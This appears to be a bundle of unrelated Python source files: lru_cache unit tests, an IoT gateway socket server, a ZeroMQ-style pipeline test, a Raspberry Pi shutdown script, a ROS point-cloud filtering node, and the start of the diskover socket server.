self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
@ignore_skulpt
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with threading_helper.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can be not equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with threading_helper.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
@ignore_skulpt
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with threading_helper.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
@ignore_skulpt
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with threading_helper.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_lru_method(self):
global _self
_self = self
class X(int):
f_cnt = 0
@_self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
@ignore_skulpt
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
# with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
# with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
def test_lru_cache_parameters(self):
@self.module.lru_cache(maxsize=2)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 2, "typed": False})
@self.module.lru_cache(maxsize=1000, typed=True)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 1000, "typed": True})
@ignore_skulpt
def test_lru_cache_weakrefable(self):
@self.module.lru_cache
def test_function(x):
return x
class A:
@self.module.lru_cache
def test_method(self, x):
return (self, x)
@staticmethod
@self.module.lru_cache
def test_staticmethod(x):
return (self, x)
refs = [weakref.ref(test_function),
weakref.ref(A.test_method),
weakref.ref(A.test_staticmethod)]
for ref in refs:
self.assertIsNotNone(ref())
del A
del test_function
gc.collect()
for ref in refs:
self.assertIsNone(ref())
# @py_functools.lru_cache()
# def py_cached_func(x, y):
# return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
# class TestLRUPy(TestLRU, unittest.TestCase):
# module = py_functools
# cached_func = py_cached_func,
# @module.lru_cache()
# def cached_meth(self, x, y):
# return 3 * x + y
# @staticmethod
# @module.lru_cache()
# def cached_staticmeth(x, y):
# return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
if __name__ == '__main__':
unittest.main(verbosity=1)
|
server.py
|
#!/usr/bin/env python3
import sys
import socket
import selectors
import traceback
from tools import registerDeviceOnIotHub,startClient
from config import GatewayConfig
import multiprocessing
def serverStarter(COORDINATOR_NAME):
print("starting client")
startClient(COORDINATOR_NAME)
print("Client Started")
COORDINATOR_PORT = GatewayConfig[COORDINATOR_NAME]
print("Started Coordinator device "+COORDINATOR_NAME + " listening at port " , COORDINATOR_PORT)
s = socket.socket()
print(COORDINATOR_PORT)
s.bind(('127.0.0.1', COORDINATOR_PORT))
s.listen(5)
while True:
c, addr = s.accept()
deviceId = c.recv(1024).decode()
if deviceId:
print("deviceid received ", deviceId)
registerDeviceOnIotHub(deviceId, COORDINATOR_NAME)
c.close()
if __name__ == '__main__':
for gateway in GatewayConfig.keys():
p = multiprocessing.Process(target=serverStarter,args = (gateway,))
p.start()
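# For illustration only: a minimal sketch of the device-side client that a
# coordinator started above is assumed to expect.  It connects to the
# coordinator's local port and sends its device id as a plain UTF-8 string
# (the coordinator reads it with c.recv(1024).decode()).  The function name
# and values are placeholders, not taken from a real deployment.
def example_device_client(device_id, coordinator_port):
    with socket.socket() as s:
        s.connect(('127.0.0.1', coordinator_port))
        s.send(device_id.encode())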
|
multiple_pipelines_test.py
|
# -*- coding: utf-8 -*-
#
# ventilatorA-------------+
# | |
# +--------+-------+ |
# | | | |
# workerA workerA workerA ... |
# | | | |
# +--------+-------+ |
# | |
# sinkA-----------------+
# &
# ventilatorB-------------+
# | |
# +--------+-------+ |
# | | | |
# workerB workerB workerB ... |
# | | | |
# +--------+-------+ |
# | |
# sinkB-----------------+
#
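# The two pipelines are chained: TestSinkAVentilatorB (sink A) turns every result
# it receives from the A-workers into a fresh job for the B-workers via
# ventilator B, and TestSinkB (sink B) collects the final results.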
import os
import time
import random
import signal
import logging
import shutil
import tempfile
import threading
import unittest
from collections import OrderedDict
from multiprocessing import cpu_count, Process
from zmessage.pipeline import Sink, Ventilator, VentilatorToWorkerMessage, Worker, WorkerToSinkMessage
from .testlogging import setup_logging, update_formatter
try:
from typing import Any, Iterator, Optional, Tuple, Type, TypeVar
VentilatorWorkerMessageType = TypeVar('VentilatorWorkerMessageType', bound='VentilatorToWorkerMessage')
WorkerSinkMessageType = TypeVar('WorkerSinkMessageType', bound='WorkerToSinkMessage')
except ImportError:
pass
workersA = OrderedDict()
workersB = OrderedDict()
savb_process = None
NUM_WORKERS = max(2, min(4, cpu_count() - 1))
NUM_JOBS = 10000
class TestVentilatorToWorkerMessage(VentilatorToWorkerMessage):
types = ('sleep',)
required_data = ('sleep',)
def is_valid_sleep(self): # type: () -> Tuple[bool, str]
"""
>>> TestVentilatorToWorkerMessage('foo', foo='bar').is_valid()
(False, "Value of 'type' must be one of sleep.")
>>> TestVentilatorToWorkerMessage('sleep', foo='bar').is_valid()
(False, "Required data 'sleep' is unset in message.")
>>> TestVentilatorToWorkerMessage('sleep', sleep='bar').is_valid()
(False, "'sleep' must be a float.")
>>> TestVentilatorToWorkerMessage('sleep', sleep=2).is_valid()
(True, '')
"""
try:
float(self.get('sleep')) # type: ignore # noqa
except (TypeError, ValueError):
return False, "'sleep' must be a float."
return True, ''
class TestWorkerToSinkMessage(WorkerToSinkMessage):
types = ('job done',)
required_data = ('ventilator_request_id', 'slept')
class TestVentilator(Ventilator):
def __init__(self, jobs_in_addr, job_id_sink_addr): # type: (str, str) -> None
super(TestVentilator, self).__init__(jobs_in_addr, job_id_sink_addr)
self.jobs_sent = 0
def requests(self): # type: () -> Iterator[VentilatorWorkerMessageType]
while self.jobs_sent < NUM_JOBS:
yield TestVentilatorToWorkerMessage('sleep', sleep=random.random() / 500.0)
self.jobs_sent += 1
class TestWorker(Worker):
VentilatorWorkerMessageCls = TestWorkerToSinkMessage
def __init__(self, jobs_in_addr, worker_control_addr, results_out_addr): # type: (str, str, str) -> None
super(TestWorker, self).__init__(jobs_in_addr, worker_control_addr, results_out_addr)
self.time_waited = 0.0
def do_work(self, request): # type: (VentilatorWorkerMessageType) -> WorkerSinkMessageType
time.sleep(request['sleep'])
self.time_waited += request['sleep']
slept = request.get('slept') or {}
slept[self.name] = self.time_waited
return TestWorkerToSinkMessage(mtype='job done', ventilator_request_id=request.id, slept=slept)
def start(self, install_sig_handler=True, *args, **kwargs): # type: (Optional[bool], *Any, **Any) -> Any
# update PID in logger
pid = os.getpid()
if self.pid != pid:
self.pid = pid
update_formatter(logging.getLogger('zmessage'), os.getpid())
super(TestWorker, self).start(install_sig_handler, *args, **kwargs)
class TestSinkB(Sink):
_printed = 0.0
_log_interval = 10.0
def __init__(self, *args, **kwargs):
super(TestSinkB, self).__init__(*args, **kwargs)
self.workers_slept = {}
def handle_result(self, request): # type: (WorkerSinkMessageType) -> None
for k, v in request['slept'].items():
if v > self.workers_slept.get(k, 0.0):
self.workers_slept[k] = v
self.print_open_requests()
def print_open_requests(self):
now = time.time()
if self._printed + self._log_interval < now:
self._printed = now
self.logger.info(
'[%s] Waiting for %d unfinished requests (and %d unknown)...',
self.name,
len(self.unfinished_request_ids), len(self.unknown_ventilator_request_ids)
)
def run(self, *args, **kwargs): # type: (*Any, **Any) -> Any
self._printed = time.time()
super(TestSinkB, self).run(*args, **kwargs)
class TestSinkAVentilatorB(TestSinkB):
def __init__(self, ventilator, *args, **kwargs): # type: (TestVentilator, *Any, **Any) -> None
super(TestSinkAVentilatorB, self).__init__(*args, **kwargs)
self.ventilator = ventilator
def init(self, install_sig_handler=True): # type: (Optional[bool]) -> None
super(TestSinkAVentilatorB, self).init(install_sig_handler)
self.ventilator.context = self.context
self.ventilator.init(install_sig_handler)
def cleanup(self): # type: () -> None
self.ventilator.cleanup()
super(TestSinkAVentilatorB, self).cleanup()
def handle_result(self, request): # type: (WorkerSinkMessageType) -> None
for k, v in request['slept'].items():
if v > self.workers_slept.get(k, 0.0):
self.workers_slept[k] = v
self.print_open_requests()
self.ventilator.send_job(
TestVentilatorToWorkerMessage('sleep', sleep=random.random() / 500.0, slept=self.workers_slept)
)
def run(self, *args, **kwargs): # type: (*Any, **Any) -> Any
super(TestSinkAVentilatorB, self).run(*args, **kwargs)
self.ventilator.logger.debug('[%s] Ventilator finished sending requests: %r.',
self.ventilator.name, self.ventilator.request_count)
self.ventilator.logger.debug('[%s] Telling sink B we have finished sending.', self.name)
self.ventilator.send_finished()
def start(self, install_sig_handler=True, *args, **kwargs): # type: (Optional[bool], *Any, **Any) -> Any
# update PID in logger
pid = os.getpid()
if self.pid != pid:
self.pid = pid
update_formatter(logging.getLogger('zmessage'), os.getpid())
super(TestSinkAVentilatorB, self).start(install_sig_handler, *args, **kwargs)
def kill_processesA(signum, frame): # type: (int, Any) -> None
for p in workersA.values():
try:
os.kill(p.pid, signal.SIGINT)
except OSError as exc:
import errno
# ignore "no such process" as it might have been joined already
if exc.errno != errno.ESRCH:
raise
def kill_processesB(signum, frame): # type: (int, Any) -> None
for p in workersB.values():
try:
os.kill(p.pid, signal.SIGINT)
except OSError as exc:
import errno
# ignore "no such process" as it might have been joined already
if exc.errno != errno.ESRCH:
raise
def kill_savb(signum, frame): # type: (int, Any) -> None
try:
os.kill(savb_process.pid, signal.SIGINT)
except OSError as exc:
import errno
# ignore "no such process" as it might have been joined already
if exc.errno != errno.ESRCH:
raise
class TestMultiplePipeline(unittest.TestCase):
def setUp(self):
self.skipTest('disabled')
self.socket_dir = tempfile.mkdtemp()
self.jobs_for_workersA_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'jobs_for_workersA.socket'))
self.job_ids_for_sinkA_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'job_ids_for_sinkA_addr.socket'))
self.workersA_results_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'workersA_results_addr.socket'))
self.workersA_control_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'workersA_control.socket'))
self.jobs_for_workersB_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'jobs_for_workersB.socket'))
self.job_ids_for_sinkB_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'job_ids_for_sinkB_addr.socket'))
self.workersB_results_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'workersB_results_addr.socket'))
self.workersB_control_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'workersB_control.socket'))
def tearDown(self):
shutil.rmtree(self.socket_dir)
def runTest(self):
global savb_process
logger = setup_logging('zmessage', logging.DEBUG, os.getpid())
# start workers in separate processes
for char, processes in (('A', workersA), ('B', workersB)):
for num in range(NUM_WORKERS):
worker = TestWorker(
getattr(self, 'jobs_for_workers{}_addr'.format(char)),
getattr(self, 'workers{}_control_addr'.format(char)),
getattr(self, 'workers{}_results_addr'.format(char))
)
worker.name = 'Worker {} {}'.format(char, num + 1)
p = Process(target=worker.start, name=worker.name)
p.start()
processes[worker] = p
logger.info('Started worker %s %d/%d (PID %d, name %r).',
char, num + 1, NUM_WORKERS, p.pid, worker.name)
t0 = time.time()
# start ventilator A in thread of main process
ventilator_a = TestVentilator(self.jobs_for_workersA_addr, self.job_ids_for_sinkA_addr)
ventilator_a.name = 'Ventilator A'
ventilator_thread = threading.Thread(target=ventilator_a.start)
ventilator_thread.start()
logger.info('Started ventilator A (in thread).')
# start ventilator B + sink A in separate process
ventilator_b = TestVentilator(self.jobs_for_workersB_addr, self.job_ids_for_sinkB_addr)
ventilator_b.name = 'Ventilator B'
sink_a_vent_b = TestSinkAVentilatorB(
ventilator_b,
self.workersA_results_addr,
self.workersA_control_addr,
self.job_ids_for_sinkA_addr
)
sink_a_vent_b.name = 'Sink A'
savb_process = Process(target=sink_a_vent_b.start, name=sink_a_vent_b.name)
savb_process.start()
logger.info('Started SinkA/VentB process (PID %d, name %r).', savb_process.pid, savb_process.name)
# start sink B (blocking in main process)
sink_b = TestSinkB(self.workersB_results_addr, self.workersB_control_addr, self.job_ids_for_sinkB_addr)
sink_b.name = 'Sink B'
sink_b.start()
logger.info('Sink B finished.')
t1 = time.time()
# shutdown
ventilator_thread.join()
previous_handler = None
try:
# stop sinkA+ventB, if it didn't already
previous_handler = signal.signal(signal.SIGALRM, kill_savb)
signal.alarm(1)
savb_process.join()
logger.info('SinkA / VentB with PID %d and name %r ended.', savb_process.pid, savb_process.name)
# stop workers, if they didn't already
for char, process_list, kill_func in (
('A', workersA.values(), kill_processesA),
('B', workersB.values(), kill_processesB)
):
signal.signal(signal.SIGALRM, kill_func)
for count, process in enumerate(process_list):
signal.alarm(1)
process.join()
logger.info('Worker %d/%d with PID %d and name %r ended.',
count + 1, len(process_list), process.pid, process.name)
except KeyboardInterrupt:
            logger.warning('KeyboardInterrupt: Sending SIGINT to all workers...')
for p in workersA.values():
os.kill(p.pid, signal.SIGINT)
p.join()
for p in workersB.values():
os.kill(p.pid, signal.SIGINT)
p.join()
if previous_handler:
signal.signal(signal.SIGALRM, previous_handler)
logger.info('The End.')
logger.info('')
for name in sorted(sink_b.workers_slept.keys()):
logger.info('%s slept %0.2f sec.', name, sink_b.workers_slept[name])
logger.info('-' * 26)
logger.info('%d workers slept : %0.2f', len(workersA) + len(workersB), sum(sink_b.workers_slept.values()))
logger.info('Wall time elapsed: %0.2f', t1 - t0)
self.assertEqual(len(sink_b.unfinished_request_ids), 0, 'Not all requests reached the sink.')
self.assertEqual(len(sink_b.unknown_ventilator_request_ids), 0, 'The sink received unknown requests.')
self.assertLess(t1 - t0, sum(sink_b.workers_slept.values()), "Workers didn't sleep in parallel.")
if __name__ == '__main__':
import doctest
doctest.testmod()
unittest.main(verbosity=2)
|
pi_master.py
|
"""Simulate the shutdown sequence on the master pi."""
import socket
import threading
import time
from pathlib import Path
def talk_to_train():
with socket.socket() as sock:
# TODO: replace localhost with static ip of train pi
# port number has to match the socket.bind() of the other program.
#sock.connect(('localhost', 31337))
sock.connect(('192.168.1.92', 31337)) #34 home changes at GP's
print('made connection to train pi, asked for shutdown')
# Wait until the train pi has signaled its shutdown is complete. We
# don't actually need to receive any data. This call blocks until the
# connection is gracefully closed by the train pi, or broken due to a
# network error. In either case, we assume it has shut down.
sock.recv(1024)
print('shutdown acknowledged')
if __name__ == '__main__':
# when shutdown is pressed create a background thread that will create a socket to
# connect to the train pi
# main thread goes through shutdown sequence
# background thread waits for signal that train pi has shut down
# when both threads have completed, gracefully exit
input('Press enter to begin shutdown...')
bg = threading.Thread(target=talk_to_train)
bg.start()
# Simulate the work of shutting down master pi programs.
Path('/home/pi/Documents/stop/shutdown/Vegas_train_shutdown').touch()
for i in range(10, 0, -1):
print(i)
time.sleep(1)
print('master pi shutdown, waiting for train pi')
bg.join()
print('shutdown complete')
#Path('/home/pi/Documents/stop/shutdown/Vegas_train_shutdown').touch()
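    # For reference, the train pi side of this handshake is assumed to look roughly
    # like the sketch below (hypothetical; not part of this script): it binds port
    # 31337, accepts the connection made by talk_to_train(), runs its own shutdown
    # sequence, and then closes the socket so the blocking sock.recv(1024) above
    # returns and this program can finish.
    #   with socket.socket() as srv:
    #       srv.bind(('', 31337))
    #       srv.listen(1)
    #       conn, _ = srv.accept()
    #       ...  # train pi shutdown work
    #       conn.close()  # graceful close unblocks the master pi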
|
pc2obs.py
|
# Press ESC in the OpenCV window to quit
import numpy as np
import cv2
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import math
import time
import sys
import rospy
import sensor_msgs.point_cloud2 as pc2
from sensor_msgs.msg import PointCloud2, CompressedImage, PointField
from nav_msgs.msg import Odometry
from std_msgs.msg import String, Header
from cv_bridge import CvBridge, CvBridgeError
import threading
from time import sleep
import csv
global depth_scale, ROW, COL
global currentStatus
rospy.init_node('pc2obs', anonymous=False)
#size of images
COL= 480
ROW = 640
#ROBOT MOVE
SPEED = 15
ROTATE_SPEED = 25
currentStatus = ""
font = cv2.FONT_HERSHEY_SCRIPT_SIMPLEX
fontScale = 1.5
yellow = (0, 255, 255)
handle_easy = True
points_raw = 0
color_image_raw = 0
cmd_vel = 0
robot_state = 0
t = time.time()
def euler_from_quaternion(x,y,z,w):
t3 = 2.0*(w*z+x*y)
t4 = 1.0-2.0*(y*y+z*z)
yaw_z = math.atan2(t3,t4)
return yaw_z
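# Worked example for the yaw extraction above (illustrative values): a +90 degree
# rotation about z is the quaternion (x, y, z, w) = (0, 0, 0.7071, 0.7071), giving
# t3 = 2*(0.7071*0.7071) = 1.0 and t4 = 1 - 2*(0.7071**2) = 0.0, so
# euler_from_quaternion(0, 0, 0.7071, 0.7071) returns atan2(1, 0) = pi/2.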
#Topview image. src, dst are numpy array.
# NOTE: move the lavacon (traffic cone) to each edge of the frame and try again (calibration reminder).
def Topview(src):
global WARP_PARAM, ROW, COL
# col=720, row=1280
col, row = src.shape[0], src.shape[1]
corners = np.float32([[row*WARP_PARAM/2, 0], [row*(1-WARP_PARAM/2), 0], [0, col], [row, col]])
warp_corners = np.float32([[0, 0], [ROW, 0], [0, COL], [ROW, COL]])
trans_matrix = cv2.getPerspectiveTransform(corners, warp_corners)
dst = cv2.warpPerspective(src, trans_matrix, (ROW, COL))
return dst
def preGroundSeg(depth_image, color_image):
global ROW, COL, GRN_ROI
# FIXME: don't do ZOOM_PARAM in GAZEBO
# ROI image
depth_image = depth_image[GRN_ROI:COL, 0:ROW]
color_image = color_image[GRN_ROI:COL, 0:ROW]
# Topview image
depth_image2 = Topview(depth_image)
color_image2 = Topview(color_image)
return depth_image2, color_image2
def GroundSeg(depth_image, color_image, stride=80):
global ROW
virtual_lane_available = []
for i in range(stride, ROW, stride):
if args.plot and i == ROW/2:
temp_image, dead_end = verticalGround(depth_image, color_image, i, plot=True)
else:
temp_image, dead_end = verticalGround(depth_image, color_image, i, plot=False)
virtual_lane_available.append(dead_end)
return temp_image, virtual_lane_available
def points_callback(data):
global points_raw
points_raw = data
from rosgraph_msgs.msg import Clock
sim_time = 0.0
def time_callback(data):
global sim_time
_sec = data.clock.secs
_nsec = data.clock.nsecs
sim_time = _sec + _nsec * 0.000000001
def image_callback(data):
global color_image_raw
color_image_raw = bridge.compressed_imgmsg_to_cv2(data, "bgr8")
def cmd_callback(data):
global cmd_vel
cmd_vel = data
def state_callback(data):
global robot_state
q = data.pose.pose.orientation
yaw = euler_from_quaternion(q.x, q.y, q.z, q.w)
yaw = yaw-math.pi/2 if yaw-math.pi/2 < math.pi else yaw+3*math.pi/2
robot_state = [data.pose.pose.position.x, data.pose.pose.position.y, -yaw]
def listener():
rospy.Subscriber("/camera/depth/points", PointCloud2, points_callback)
#rospy.Subscriber("/camera/color/image_raw/compressed", CompressedImage, image_callback)
# rospy.Subscriber("/gazebo/model_states", ModelStates, state_callback)
rospy.Subscriber("/odom", Odometry, state_callback)
rospy.Subscriber("/clock", Clock, time_callback)
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
direc = 0
def pc2obs_init():
# Configure depth and color streams
global bridge, pub
bridge = CvBridge()
realsense_listener = threading.Thread(target=listener)
realsense_listener.start()
pub = rospy.Publisher("obs_center", PointCloud2, queue_size=1)
fields = [PointField('x',0,PointField.FLOAT32,1),
PointField('y',4,PointField.FLOAT32,1),
PointField('z',8,PointField.FLOAT32,1)]
header = Header()
header.frame_id = "map"
def pc2obs(voxel_size = 0.3, plot=False, ros=True):
global points_raw, color_image_raw, robot_state, bridge, currentStatus, handle_easy, pub, sim_time
#print(points_raw)
# if type(points_raw) == type(0) or type(color_image_raw) == type(0):
if type(points_raw) == type(0) or sim_time == 0.0:
print("NOT CONNECTED")
sleep(0.1)
return False, False, False
t1 = time.time()
points = pc2.read_points(points_raw, skip_nans=True, field_names=("x", "y", "z"))
points = np.array(list(points), dtype=np.float32)
if len(points) == 0:
return False, False, False
t2 = time.time()
#print("length pre-processed points: {}".format(len(points)))
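    # Voxel-grid downsampling: bucket the points into cubes of side voxel_size and
    # keep one representative per non-empty voxel (the point closest to that voxel's
    # barycenter).  `inverse` maps each point to its voxel and `nb_pts_per_voxel`
    # holds the bucket sizes, so sorting by `inverse` lets each voxel's points be
    # sliced out in a single pass below.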
np_vox = np.ceil((np.max(points, axis=0) - np.min(points, axis=0)) / voxel_size)
non_empty_voxel_keys, inverse, nb_pts_per_voxel = np.unique(((points - np.min(points, axis=0)) // voxel_size).astype(int), axis=0, return_inverse=True, return_counts=True)
idx_pts_sorted = np.argsort(inverse)
voxel_grid = {}
grid_barycenter, grid_candidate_center = [], []
last_seen = int(0)
for idx, vox in enumerate(non_empty_voxel_keys):
voxel_grid[tuple(vox)] = points[idx_pts_sorted[int(last_seen):int(last_seen + nb_pts_per_voxel[idx])]]
grid_barycenter.append(np.mean(voxel_grid[tuple(vox)], axis=0))
grid_candidate_center.append(voxel_grid[tuple(vox)][np.linalg.norm(voxel_grid[tuple(vox)] - np.mean(voxel_grid[tuple(vox)], axis=0), axis=1).argmin()])
last_seen += nb_pts_per_voxel[idx]
points = np.array(list(filter(lambda x: x[0] != 0, list(grid_candidate_center))))
t3 = time.time()
points_layer = []
for i, p in enumerate(points):
# When the pointcloud has z-foward axis, the xyz-coordinate order should be [p[0], p[2], -p[1]].
#if -p[1] > 0.1 and -p[1] < 0.6:
# points_layer.append([p[0], p[2], -p[1]])
# When the pointcloud has x-foward axis, the xyz-coordinate order should be [-p[1], p[0], p[2]].
if p[2] > 0.1 and p[2] < 0.6:
points_layer.append([-p[1], p[0], p[2]])
samples = np.array(points_layer)
if plot:
print("time took")
print(t2-t1)
print(t3-t2)
print(time.time() - t3)
plt.scatter(points[:,0], points[:,2], label='voxel grid filtering')
if len(samples):
plt.scatter(samples[:,0], samples[:,1], label='height filtering')
plt.xlim(-1.5,1.5)
plt.ylim(0,6)
plt.legend()
plt.title("Top view points after filter processing")
plt.xlabel("x (m)")
plt.ylabel("y (m)")
plt.pause(0.05)
plt.cla()
plt.clf()
color_image = color_image_raw
# Show images
#cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)
#cv2.imshow('RealSense', color_image)
#cv2.imshow('RealSense_depth', depth_image)
if cv2.waitKey(1) == 27: #esc
cv2.destroyAllWindows()
rospy.signal_shutdown("esc")
if args.csv:
f.close()
sys.exit(1)
if ros:
pub_pc2 = pc2.create_cloud(header, fields, samples)
pub_pc2.header.stamp = rospy.Time.now()
pub.publish(pub_pc2)
return samples, robot_state, sim_time
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--control', action='store_true')
parser.add_argument('--plot', action='store_true')
parser.add_argument('--csv', action='store_true')
args = parser.parse_args()
if args.csv:
CSV_NAME = "office_01"
f= open(CSV_NAME+'.csv','w')
wr = csv.writer(f)
wr.writerow(["time", \
"linear_x", "angular_z", \
"deadends"])
pc2obs_init()
while True:
samples = pc2obs(voxel_size = 0.3, plot=args.plot)
# print(samples)
    # Unreachable in normal operation: pc2obs() closes the CSV file and exits the
    # process itself when ESC is pressed in the OpenCV window.
    if args.csv:
        f.close()
    exit()
|
diskover_socket_server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that index's
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2018
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
from diskover import q_crawl, adaptive_batch, config, get_time
from diskover_bot_module import scrape_tree_meta
import socket
import subprocess
try:
import queue as Queue
except ImportError:
import Queue
import threading
import uuid
import json
import time
import sys
import pickle
import struct
# dict to hold socket tasks
socket_tasks = {}
# list of socket client
clientlist = []
def socket_thread_handler(threadnum, q, cliargs, logger):
"""This is the socket thread handler function.
It runs the command msg sent from client.
"""
BUFF = 1024
while True:
try:
c = q.get()
clientsock, addr = c
logger.debug(clientsock)
logger.debug(addr)
data = clientsock.recv(BUFF)
data = data.decode('utf-8')
